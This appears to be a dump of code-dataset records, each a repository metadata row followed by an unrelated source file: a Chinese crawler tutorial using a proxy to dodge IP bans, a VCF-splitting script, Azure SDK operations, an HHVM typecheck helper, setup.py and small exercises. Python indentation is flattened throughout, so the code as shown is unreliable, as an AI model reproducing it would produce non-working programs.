9e80f8345769e92d4e8fb3b81070349c27728a06 | 6fadc260ab5c0109adf026cb8dae8eefcf0ba271 | /第五章:requests模块高级/3.代理操作.py | 0c1773ae5889a4b22a652ac9caca78f2e2f06950 | [] | no_license | Echo-yay/Crawler_base | 03d439f5fb76d98ef881dada4fec90e24689c424 | 808b40198c887739f2721bec47c61f255d76706a | refs/heads/master | 2023-04-02T17:57:16.318607 | 2021-04-13T02:34:04 | 2021-04-13T02:34:04 | 346,982,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | # 中国矿业大学(北京)/ 机电硕-6 / ZQT2000405103 / 李天鸽
# 编辑时间:2021/3/30 11:40
#需求:
import requests
url = 'https://www.baidu.com/s?wd=IP'
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'
}
page_text = requests.get(url=url,headers=headers,proxies={'https':'121.20.48.98:37859'}).text
with open('ip.html','w',encoding='utf-8') as fp:
fp.write(page_text)
#反爬机制:封IP
#反反爬机制:使用代理进行请求发送
| [
"1740636835@qq.com"
] | 1740636835@qq.com |
3051b5bf40691b588759dbb19716f1297f6e2f24 | 7cd6a7bc72f0026056a7238c0feea081bfff13a7 | /bioprocs/scripts/vcf/pVcfSplit.py | e3c812d9b357910cb9cc4fd6481bd4e244304649 | [
"MIT"
] | permissive | shijianasdf/biopipen | 8d963ccca38e2a9d7a46582a5eec45c38924655c | d53b78aa192fd56a5da457463b099b2aa833b284 | refs/heads/master | 2023-08-18T18:28:03.306877 | 2019-12-31T16:17:35 | 2019-12-31T16:17:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,318 | py | from os import path
from sys import stderr
from diot import Diot
from bioprocs.utils import parallel, shell2 as shell
from bioprocs.utils.reference import vcfIndex
infile = {{i.infile | quote}}
prefix = {{i.infile | fn2 | quote}}
outdir = {{o.outdir | quote}}
samples = {{i.samples | quote}}
tool = {{args.tool | quote}}
bcftools = {{args.bcftools | quote}}
gatk = {{args.gatk | quote}}
tabix = {{args.tabix | quote}}
ref = {{args.ref | quote}}
params = {{args.params | repr}}
nthread = {{args.nthread | repr}}
shell.load_config(bcftools = bcftools, gatk = gatk)
vcfIndex(infile, tabix = tabix)
allsamples = shell.bcftools.query(l = infile).splitlines()
allsamples = [s.strip() for s in allsamples if s.strip()]
if samples:
with open(samples) as f:
samples = f.readlines()
samples = list(set(allsamples) & set(samples))
else:
samples = allsamples
def run_bcftools_one(sample):
shell.fg.bcftools.view(_ = infile, s = sample, o = path.join(outdir, '{}-{}.vcf'.format(prefix, sample)), **params)
def run_bcftools():
parallel.Parallel(nthread).run(run_bcftools_one, [(sample,) for sample in samples])
def run_awk_one(sample, index, awkfile):
shell.awk(
v = ["sample={!r}".format(sample), "index={}".format(index + 10)],
_stderr = stderr,
f = awkfile,
_ = infile,
_out = path.join(outdir, '{}-{}.vcf'.format(prefix, sample)))
def run_awk():
# write the awk script
awkfile = path.join(outdir, 'vcfsample.awk')
awkfh = open(awkfile, 'w')
awkfh.write("""
BEGIN {
OFS="\\t"
}
$0 ~ "^##" {
print
}
$0 ~ "^#CHROM" {
print "#CHROM\\tPOS\\tID\\tREF\\tALT\\tQUAL\\tFILTER\\tINFO\\tFORMAT\\t"sample
}
$0 !~ "^#" {
print $1,$2,$3,$4,$5,$6,$7,$8,$9,$index
}
""")
awkfh.close()
parallel.Parallel(nthread).run(run_awk_one, [(sample, i, awkfile) for i, sample in enumerate(samples)])
def run_gatk_one(sample):
shell.fg.gatk(
R = ref,
V = infile,
o = path.join(outdir, '{}-{}.vcf'.format(prefix, sample)),
sample_name = sample,
T = 'SelectVariants',
excludeNonVariants = True,
**params
)
def run_gatk():
parallel.Parallel(nthread).run(run_gatk_one, [(sample, ) for sample in samples])
tools = dict(bcftools = run_bcftools, awk = run_awk, gatk = run_gatk)
try:
tools[tool]()
except KeyError:
raise ValueError('Tool {!r} not supported yet.'.format(tool))
| [
"pwwang@pwwang.com"
] | pwwang@pwwang.com |
670f9701fbec9a75954af763abaa0d149061f45e | d7016f69993570a1c55974582cda899ff70907ec | /sdk/eventhub/azure-mgmt-eventhub/azure/mgmt/eventhub/v2021_11_01/aio/operations/_private_endpoint_connections_operations.py | fa908157bc8dcc1fd2a5e6390e0cd97f16d1ce46 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 24,069 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._private_endpoint_connections_operations import (
build_create_or_update_request,
build_delete_request,
build_get_request,
build_list_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateEndpointConnectionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.eventhub.v2021_11_01.aio.EventHubManagementClient`'s
:attr:`private_endpoint_connections` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(
self, resource_group_name: str, namespace_name: str, **kwargs: Any
) -> AsyncIterable["_models.PrivateEndpointConnection"]:
"""Gets the available PrivateEndpointConnections within a namespace.
.. seealso::
- https://msdn.microsoft.com/en-us/library/azure/mt639412.aspx
:param resource_group_name: Name of the resource group within the azure subscription. Required.
:type resource_group_name: str
:param namespace_name: The Namespace name. Required.
:type namespace_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PrivateEndpointConnection or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
cls: ClsType[_models.PrivateEndpointConnectionListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
namespace_name=namespace_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PrivateEndpointConnectionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections"
}
@overload
async def create_or_update(
self,
resource_group_name: str,
namespace_name: str,
private_endpoint_connection_name: str,
parameters: _models.PrivateEndpointConnection,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.PrivateEndpointConnection:
"""Creates or updates PrivateEndpointConnections of service namespace.
.. seealso::
- https://msdn.microsoft.com/en-us/library/azure/mt639408.aspx
:param resource_group_name: Name of the resource group within the azure subscription. Required.
:type resource_group_name: str
:param namespace_name: The Namespace name. Required.
:type namespace_name: str
:param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
:type private_endpoint_connection_name: str
:param parameters: Parameters supplied to update Status of PrivateEndPoint Connection to
namespace resource. Required.
:type parameters: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection or the result of cls(response)
:rtype: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def create_or_update(
self,
resource_group_name: str,
namespace_name: str,
private_endpoint_connection_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.PrivateEndpointConnection:
"""Creates or updates PrivateEndpointConnections of service namespace.
.. seealso::
- https://msdn.microsoft.com/en-us/library/azure/mt639408.aspx
:param resource_group_name: Name of the resource group within the azure subscription. Required.
:type resource_group_name: str
:param namespace_name: The Namespace name. Required.
:type namespace_name: str
:param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
:type private_endpoint_connection_name: str
:param parameters: Parameters supplied to update Status of PrivateEndPoint Connection to
namespace resource. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection or the result of cls(response)
:rtype: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def create_or_update(
self,
resource_group_name: str,
namespace_name: str,
private_endpoint_connection_name: str,
parameters: Union[_models.PrivateEndpointConnection, IO],
**kwargs: Any
) -> _models.PrivateEndpointConnection:
"""Creates or updates PrivateEndpointConnections of service namespace.
.. seealso::
- https://msdn.microsoft.com/en-us/library/azure/mt639408.aspx
:param resource_group_name: Name of the resource group within the azure subscription. Required.
:type resource_group_name: str
:param namespace_name: The Namespace name. Required.
:type namespace_name: str
:param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
:type private_endpoint_connection_name: str
:param parameters: Parameters supplied to update Status of PrivateEndPoint Connection to
namespace resource. Is either a PrivateEndpointConnection type or a IO type. Required.
:type parameters: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection or the result of cls(response)
:rtype: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "PrivateEndpointConnection")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
namespace_name=namespace_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.create_or_update.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
create_or_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, namespace_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
namespace_name=namespace_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, namespace_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes a Private Endpoint Connection.
.. seealso::
- https://msdn.microsoft.com/en-us/library/azure/mt639389.aspx
:param resource_group_name: Name of the resource group within the azure subscription. Required.
:type resource_group_name: str
:param namespace_name: The Namespace name. Required.
:type namespace_name: str
:param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
namespace_name=namespace_name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@distributed_trace_async
async def get(
self, resource_group_name: str, namespace_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> _models.PrivateEndpointConnection:
"""Gets a description for the specified Private Endpoint Connection name.
.. seealso::
- https://msdn.microsoft.com/en-us/library/azure/mt639379.aspx
:param resource_group_name: Name of the resource group within the azure subscription. Required.
:type resource_group_name: str
:param namespace_name: The Namespace name. Required.
:type namespace_name: str
:param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection or the result of cls(response)
:rtype: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
namespace_name=namespace_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
| [
"noreply@github.com"
] | kurtzeborn.noreply@github.com |
67f1aeaeeb28bc19427a45aebf9aaacfbf59f93d | 308f5596f1c7d382520cfce13ceaa5dff6f4f783 | /hphp/runtime/ext/core/typecheck_systemlib.py | e9f409239b23debb5a63ec1f6f2cae32f105a0be | [
"PHP-3.01",
"Zend-2.0",
"MIT"
] | permissive | facebook/hhvm | 7e200a309a1cad5304621b0516f781c689d07a13 | d8203129dc7e7bf8639a2b99db596baad3d56b46 | refs/heads/master | 2023-09-04T04:44:12.892628 | 2023-09-04T00:43:05 | 2023-09-04T00:43:05 | 455,600 | 10,335 | 2,326 | NOASSERTION | 2023-09-14T21:24:04 | 2010-01-02T01:17:06 | C++ | UTF-8 | Python | false | false | 2,205 | py | #!/usr/bin/env python3
# Gather all of the relevant files from buck file groups and execute
# `hh_single_type_check` with the correct flags
import argparse
import os
import subprocess as p
import sys
from typing import List
FIXME_CODES: List[int] = [
# "Missing symbol:" used to break dependency cycles between files that might
# be mutually recursive or referential in some form (e.g.: any class with
# a `__Sealed` attribute).
2049,
# "Memoizing object parameters requires the capability AccessGlobals:" for
# now, we're allowing this in some places like `create_opaque_value`
4447,
# There are some functions that don't have *quite* correct coeffects; if
# we're going to change these it should be done separate from an initial
# pass making systemlib "clean."
4390,
]
FLAGS: List[str] = [
"--no-builtins",
"--is-systemlib",
# "--everything-sdt",
"--config",
"enable_no_auto_dynamic=true",
"--enable-sound-dynamic-type",
# TODO(T118594542)
"--allowed-fixme-codes-strict",
",".join(map(str, FIXME_CODES)),
"--allowed-decl-fixme-codes",
",".join(map(str, FIXME_CODES)),
]
def get_files_in(path: str) -> List[str]:
all_files = []
for root, _, files in os.walk(path):
all_files.extend(os.path.join(root, f) for f in files)
return all_files
def main():
parser = argparse.ArgumentParser(
description="Gather PHP files in given directories and run `hh_single_type_check`"
)
parser.add_argument("paths", type=str, help="paths to traverse", nargs="+")
parser.add_argument("--hhstc-path", type=str, help="`hh_single_type_check` to run")
parser.add_argument(
"--report-number-of-files",
action="store_true",
help="instead of running the typechecker, just print the number of files we'd typecheck",
)
args = parser.parse_args()
files = []
for path in args.paths:
files.extend(get_files_in(path))
if args.report_number_of_files:
print(len(list(filter(lambda f: f.endswith("php"), files))))
return
sys.exit(p.run([args.hhstc_path] + FLAGS + files).returncode)
if __name__ == "__main__":
main()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
a0198bbf0a9488b28990a3671c5ad8a112155fad | 47eb0c1ee39b673dc027f6e076b5065a76f3e002 | /setup.py | f4d718bc37e836453f711edc808cbcc7d40edcc5 | [
"BSD-3-Clause"
] | permissive | vodkabuaa/tushare | 6b814efd829519df596072b644f7c78c63c59289 | e55394e0fb6da0bd7652e11f806ad7e92b63c11c | refs/heads/master | 2021-01-15T11:20:49.527125 | 2015-01-16T16:06:55 | 2015-01-16T16:06:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | from distutils.core import setup
import codecs
import os
def read(fname):
return codecs.open(os.path.join(os.path.dirname(__file__), fname)).read()
long_desc = """
tushare
===============
.. image:: https://api.travis-ci.org/waditu/tushare.png?branch=master
:target: https://travis-ci.org/waditu/tushare
.. image:: https://badge.fury.io/py/tushare.png
:target: http://badge.fury.io/py/tushare
* easy to use as most of the data returned are pandas DataFrame objects
* can be easily saved as csv, excel or json files
* can be inserted into MySQL or Mongodb
Target Users
--------------
* financial market analyst of China
* learners of financial data analysis with pandas/NumPy
* people who are interested in China financial data
Installation
--------------
pip install tushare
"""
setup(
name='tushare',
version='0.1.4',
description='TuShare is a utility for crawling historical and Realtime Quotes data of China stocks',
# long_description=read("READM.rst"),
long_description = long_desc,
author='Jimmy Liu',
author_email='jimmysoa@sina.cn',
license='BSD',
url='https://github.com/waditu/tushare',
keywords='china stock data',
classifiers=['Development Status :: 4 - Beta',
'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: BSD License'],
packages=['tushare','tushare.stock'],
) | [
"jimmysoa@sina.cn"
] | jimmysoa@sina.cn |
1113cfabb2b7978181ed09de71a1dfa228f71d30 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/leap/03ab2a36557f4b3b8efc8905048ad923.py | 040c64db6703a4c6f58c5d9e3ed1f2307d9f5600 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 122 | py | __author__ = 'citypulse-dp'
def is_leap_year(year):
return (year % 400 == 0) or (year % 100 != 0 and year % 4 == 0)
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
41177f6514241ed36d01522abc646d69ddfca634 | 6b7857c209b9c30ec6b1bb0c7437f8f9918044d7 | /2908.py | b053aee91226d487002bed4d9beab74ba1300acc | [] | no_license | rheehot/week01-algorithm | 1a18fe8eb76bed0b7d8f26fc10736c7e0c82ec12 | 0eab27bfcad265ca2dafaf64b2ae067a1ba17639 | refs/heads/main | 2023-02-05T06:46:38.006682 | 2020-12-16T14:47:26 | 2020-12-16T14:47:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # 상수 -
'''
a, b = input().split()
for i in range(2, -1, -1):
if a[i] == b[i]:
continue
elif a[i] > b[i]:
print(a[::-1])
break
else:
print(b[::-1])
break
'''
a, b = input().split()
for i in range(2,-1,-1):
if a[i] == b[i]:
continue
elif a[i] > b[i]:
print(a[::-1])
break
else:
print(b[::-1])
break
| [
"jeongseo21@gmail.com"
] | jeongseo21@gmail.com |
3ceda185f764f5098f155d032e070beabe840183 | 6a7ca83203b1757c57fde550dc38babcad60b4e1 | /web/opsgrid/core/migrations/0003_auto_20200606_1547.py | fdbc7d9f8267f2739bc58def3eacaf991f64f01e | [
"MIT"
] | permissive | simon-weber/opsgrid | 78b6e1b01079f3447ddb97d6e5bd93f6a39fc16b | 9719b9438a4a17eb75b638613a20b534ef82edc7 | refs/heads/master | 2023-03-30T13:45:09.195901 | 2021-04-01T19:58:38 | 2021-04-01T19:58:38 | 353,765,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,784 | py | # Generated by Django 2.2.9 on 2020-06-06 15:47
import django.db.models.deletion
import django.utils.timezone
from django.conf import settings
from django.db import migrations, models
import opsgrid.core.models
class Migration(migrations.Migration):
dependencies = [
("core", "0002_auto_20200530_2351"),
]
operations = [
migrations.CreateModel(
name="Alert",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("jsonlogic_json", models.TextField()),
("last_updated_at", models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name="Host",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=256)),
(
"state",
models.CharField(
choices=[(opsgrid.core.models.HostState("ACT"), "ACT")],
default="ACT",
max_length=3,
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_data_at", models.DateTimeField(null=True)),
("last_metric_row_json", models.TextField(blank=True)),
("header_types_json", models.TextField(blank=True)),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
),
migrations.CreateModel(
name="AlertStatus",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"state",
models.CharField(
choices=[
("ALARM", "ALM"),
("OK", "OK"),
],
default="OK",
max_length=3,
),
),
(
"last_change_at",
models.DateTimeField(default=django.utils.timezone.now),
),
("change_metric_row_json", models.TextField(blank=True)),
(
"alert",
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE, to="core.Alert"
),
),
],
),
migrations.AddField(
model_name="alert",
name="host",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="core.Host"
),
),
migrations.AddConstraint(
model_name="host",
constraint=models.UniqueConstraint(
fields=("name", "user"), name="unique_host_per_user"
),
),
]
| [
"simon@simonmweber.com"
] | simon@simonmweber.com |
